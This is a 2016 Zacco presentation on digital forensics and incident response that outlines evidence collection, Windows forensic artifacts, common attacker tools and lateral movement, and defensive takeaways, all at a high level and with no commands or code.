DIRF

DIGITAL FORENSICS AND INCIDENT RESPONSE

KNOWING THE WHO, WHAT, WHY, WHEN AND WHERE

2016-09-13

1 © Zacco 2016
 WHO AM I
NIKLAS.ANDERSSON@ZACCO.COM
• Started in IT 1994 and moved into IT Security in 1998 – never looked
back
• Joined Zacco 2016 (previously Coresec/AddPro)
• Experience from security infrastructure like firewalls, IPS/IDP, encryption
and Windows/Linux
• Certifications
• GIAC Certified Forensic Analyst (GCFA)
• GIAC Reverse Engineering Malware (GREM)

Focus on Digital Forensics investigation and Incident Response

2 © Zacco 2016
 ZACCO
EUROPE
Copenhagen Stockholm
Aarhus Gothenburg
Lyngby Anderstorp
Esbjerg Helsingborg
Munich Linköping
Bremen Luleå
Oslo Lund
Ålesund Malmö
Sarpsborg Norrköping
Stavanger Skellefteå
Kjeller Västervik
Uppsala

3 © Zacco 2016
 ZACCO
OUR SERVICES

• Intellectual Property (IP) consultancy

• Patents Management
• Trademark
• Design
• Legal
• Information and IT Security
• Innovation Technology

4 © Zacco 2016
 ZACCO
INFORMATION AND IT SECURITY

• ISMS/ ISO 27000 / ITIL / Cobit • Enterprise Security Architecture (ESA)

• Business Continuity Management
• Digital Forensics
• PCI-DSS
• Ethical hacking
• Risk & Controls Assessments

• Cyber Risk Advisory • Vulnerability Scanning & Assessments

• Data Privacy & Protection

• Awareness training
• Internal Audit

5 © Zacco 2016
 AGENDA
DIRF
• Digital Forensics
• Collect and preserve digital evidence
• Analyze following a proven methodologies
• Report – Timeline events and activity
• Require deep technical knowledge

• Incident Response
• Don’t panic
• Have a plan
• Live acquisition of evidence

6 © Zacco 2016
 DIGITAL FORENSICS
SHORT VERSION
• Digital Forensics is equal to Computer Forensics and the term was
popularized in 1980 when personal computers arrived… …and soon
enough was used to commit crimes

• The word forensics comes from ”Forensics science”, knowledge about

how to collect, preserve and analyze evidence during an investigation

• Digital forensics is used in both criminal law and private investigations

7 © Zacco 2016
 DIGITAL FORENSICS
FOLLOW PROVEN METHODOLOGIES
• Collect evidence
• Preserve evidence
• Analysis – Forensics tools and knownledge
• Create timeline of the activity
• Present facts, not speculation
• Question the evidence and verify
• Report (important)
• List and document evidence for verification purpose

8 © Zacco 2016
 DIGITAL FORENSICS
TYPES OF INVESTIGATIONS
• Intrusions (External/internal)
• Malware infection
• Internal misuse of IT assets
• Employee stealing/trading company information
• Troubleshooting

9 © Zacco 2016
 DIGITAL FORENSICS
SOURCES
Many different types of devices and applications
• Operating Systems
• Memory Captures/Snapshot
• Hard drive/Clone/Memory card/USB Drives
• Network captures
• Applications
• Databases
• Log sources

10 © Zacco 2016
 DIGITAL FORENSICS
TYPICAL EVIDENCE OVERVIEW (WINDOWS)
Artifacts found in a memory dump/hibernation file

• Master File Table (MFT)

• Registry Hives
• Running process (find rootkit)
• Process mapped to user account
• Open files
• Network connections

11 © Zacco 2016
 DIGITAL FORENSICS
TYPICAL EVIDENCE OVERVIEW (WINDOWS)
Artifacts found in a memory dump/hibernation file

• Command line activity

• Execution history
• Local account database
• Event logs
• Schedule Tasks

12 © Zacco 2016
 DIGITAL FORENSICS
TYPICAL EVIDENCE OVERVIEW (WINDOWS)
Aditional artifacts found in harddrive and VM Clone
• Hibernation files
• All files on disk
• Deleted files
• Databases
• Active Directory
• Event Logs/Application logs
• Application crashdump(s)
• Volume Shadow Snapshot
• - MFT, Registry Hive, Logs, Hibernation files

13 © Zacco 2016
 DIGITAL FORENSICS
TYPICAL EVIDENCE OVERVIEW (WINDOWS)

Common attacks events

• Infection via email or web

• Malware Infection (Binary and/or scripts) (depends)
• Metasploit ”Meterpreter” (very common) (depends)
• Dump of AD accounts and password
• Dump Web browser password
• Persistent foot hold

14 © Zacco 2016
 DIGITAL FORENSICS
TYPICAL EVIDENCE OVERVIEW (WINDOWS)

Common attacks events

• Created accounts
• Login to Webmail/VPN
• Collected information
• Lateral movement
• Network actitvity
• Directory Browsing
• Opening of documents and pictures

15 © Zacco 2016
 DIGITAL FORENSICS
POPULAR ATTACK VECTOR
• Exploiting bugs in Operating Systems, Services or Application
• Misconfigurations
• Drive-By downloads
• Phising Email
• Key factory in many case, very helpful end users.
• Execute Binary (.exe)
• Execute scripts (PowerShell, JavaScript, Visual Basic...)

16 © Zacco 2016
 DIGITAL FORENSICS
POPULAR ATTACKER TOOLS
• Metasploit
• SqlMap
• Google
• PowerShell frameworks.
• PowerSploit
• Empire
• PSAttack
• Mimikatz (dump passwords)
• Nirsoft - Web Browser Password Dumper

The list is long .....telnet could be good enough...

17 © Zacco 2016
 DIGITAL FORENSICS
LATERAL MOVEMENT
What this means
• The attacker have compromised a computer behind the perimeter defense
• Additional tools could be download
• Psexec (SysInternal)
• ”net use” (built in)
• PowerShell (very powerful)
• Remote Desktop
• VBS Script
• Schedule Task
• Mimikatz
This normaly do not trigger any alerts on the Endpoint or gateway security
products.

18 © Zacco 2016
 DIGITAL FORENSICS
INCIDENT RESPONSE
Be prepared and have a plan
• Most important, don’t panic
• Second, don’t panic
• Know what to do and why before doing anything. (important)
• Write down things of importance
• What do we know
• When did we discover the incident
• Actions taken so far
• Users and accounts involved
• List possible resources involved
• Resource owners and contact information

Could we handle this internally?

19 © Zacco 2016
 DIGITAL FORENSICS
INCIDENT RESPONSE
Collect evidence

• Memory dumps (Volatile)

• Virtual Machines Clones
• Triage collection (Volatile)
• Firewall logs
• Event logs

Volatile = Information in memory only available when system is running.

20 © Zacco 2016
 DIGITAL FORENSICS
INCIDENT RESPONSE
Collect evidence

• VPN logs
• Webmail logs
• Active Directory
• Hard drives

Steps depends on the known scope

21 © Zacco 2016
 DIGITAL FORENSICS
INCIDENT RESPONSE
Analyze the collected evidence

• Compromized account(s), map to system/application acccess

• Active compromize or Malware infection (IOC)
• Network activity, search Firewall and SIEM
• Triage collection – Active connections or ”hacker” tools running
• Firewall logs – Connections from the system(s) involved

IOC = Indicators of Compromize

22 © Zacco 2016
 DIGITAL FORENSICS
INCIDENT RESPONSE
Analyze the collected evidence

• Event logs - A lot of valuable info

• VPN logs - Connections from compromized accounts
• Active Directory compromized (Houston, we have a problem)
• Webmail logs – Why, we store internal valuable information going years back
• Active Directory – New accounts, suspicious activity
• Hard drives – Deeper investigation is required

Steps depends on the known scope of the investigation and may change during the
investigation

23 © Zacco 2016
 DIGITAL FORENSICS
TAKEAWAYS
• Removing malware or block traffic is NOT enought.
• Additional malware or persistence may still exist.
• Reinstalling infected or compromized systems will destroy
evidence
• Data exfiltration are hidden in normal traffic.
• Attackers lateral movements might not be detected as
suspicious
• New accounts might have been created
• If we don’t know the root cause of the incident how can we fix
it?

24 © Zacco 2016
 DIGITAL FORENSICS
TAKEAWAYS
• Learn the weak spots and prioritize based on risk
• Change log settings to save further back in time
• Save all logs in a safe place as long as you can.
• Use 2FA for VPN and Webmail and other external access
• Log all traffic in and out of the company/organisation
• Update and configure PowerShell
• Volume Shadow Snapshot built in. (do not turn of)
• Limit the use of administative privileges

25 © Zacco 2016
 DIGITAL FORENSICS
MOST IMPORTANT

Learn something useful and improve for next time

Yes, there will be a next time! 

26 © Zacco 2016